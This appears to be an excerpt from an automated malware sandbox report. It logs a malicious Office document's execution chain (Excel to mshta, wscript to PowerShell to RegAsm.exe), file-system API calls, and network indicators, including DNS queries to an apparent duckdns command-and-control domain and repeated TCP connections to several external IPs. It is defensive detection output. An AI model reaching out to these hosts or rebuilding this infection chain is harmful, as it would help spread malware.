                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,26_2_00407898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,17_2_00407CD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                Software Vulnerabilities

                barindex
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: global trafficDNS query: name: zeep.ly
                Source: global trafficDNS query: name: zeep.ly
                Source: global trafficDNS query: name: ia601706.us.archive.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: geoplugin.net
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 178.237.33.50:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
